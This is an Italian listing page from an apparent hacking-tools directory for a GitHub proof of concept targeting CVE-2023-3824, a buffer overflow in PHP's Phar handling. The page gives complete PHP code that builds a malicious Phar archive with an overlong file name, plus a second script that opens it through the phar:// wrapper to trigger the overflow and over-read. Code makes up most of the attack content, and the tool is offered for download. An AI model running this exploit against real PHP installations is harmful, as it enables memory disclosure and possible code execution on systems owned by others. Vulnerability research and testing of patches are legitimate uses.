Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-3824 — La vulnerabilità nei file Phar di PHP, dovuta a un buffer overflow, deriva da controlli insufficienti sulla lunghezza dei nomi dei file all'interno dell'archivio Phar. Attori malintenzionati possono creare file Phar con nomi di file molto lunghi, causando un buffer overflow e la potenziale esecuzione di codice dannoso o la fuga di dati. Questa vulnerabilità può essere sfruttata per l'esecuzione di codice CVE-2023-3824 | Kitploit
Strumenti/GitHubGitHub/jhonnybonny/cve-2023-3824
Generazione di PayloadAnalisi delle VulnerabilitàExploitApprendimento e FormazioneBinary Exploitation
GitHubjhonnybonny/cve-2023-3824

CVE-2023-3824

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
32462 anni faNon ancora revisionato

Informazioni

La vulnerabilità nei file Phar di PHP, dovuta a un buffer overflow, deriva da controlli insufficienti sulla lunghezza dei nomi dei file all'interno dell'archivio Phar. Attori malintenzionati possono creare file Phar con nomi di file molto lunghi, causando un buffer overflow e la potenziale esecuzione di codice dannoso o la fuga di dati. Questa vulnerabilità può essere sfruttata per l'esecuzione di codice CVE-2023-3824

Condividi

PoC di File Phar Malizioso in PHP (CVE-2023-3824)

Descrizione

Questa Proof of Concept (PoC) dimostra come creare un file Phar malizioso in PHP e attivare una vulnerabilità di buffer overflow.

Utilizzo

Creazione del File Phar Malizioso

  1. Creare un nuovo file PHP (ad es. create_phar.php) e aggiungere il seguente codice:
root@kitploit:~
<?php
$phar = new Phar('malicious.phar');
$phar->startBuffering();
$phar->addFromString(str_repeat('A', PHP_MAXPATHLEN - 1).'B', 'This is the content of the file.');
$phar->stopBuffering();
?>

Eseguire lo script PHP per creare il file Phar malizioso: Copia il codice

root@kitploit:~
php create_phar.php

Attivazione del Buffer Overflow Creare un altro file PHP (ad es. trigger_overflow.php) e aggiungere il seguente codice:

root@kitploit:~
<?php
$handle = opendir("phar://./malicious.phar");
$x = readdir($handle);
closedir($handle);

var_dump($x);
?>

Eseguire lo script PHP per attivare il buffer overflow: Copia il codice php trigger_overflow.php L'istruzione var_dump($x) produrrà in output il risultato dell'operazione di buffer overflow e overread.

Scarica lo strumento